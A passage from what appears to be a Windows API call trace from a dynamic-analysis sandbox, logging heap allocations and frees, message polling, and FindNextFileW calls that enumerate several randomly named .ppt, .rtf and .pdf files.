lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x130) returned 0x8e7858 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7858 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.390] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xd1d81f90, ftLastWriteTime.dwHighDateTime=0x1d5d846, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 1 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x8ee3c8 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8e2a80 [0157.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x150) returned 0x8e7858 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7858 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.393] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xfda093c0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 1 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x130) returned 0x8e7858 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7858 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.395] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x786873d0, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 1 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: 